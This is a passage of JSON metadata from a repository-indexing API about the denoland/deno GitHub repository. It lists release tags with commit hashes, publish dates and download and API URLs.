om/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/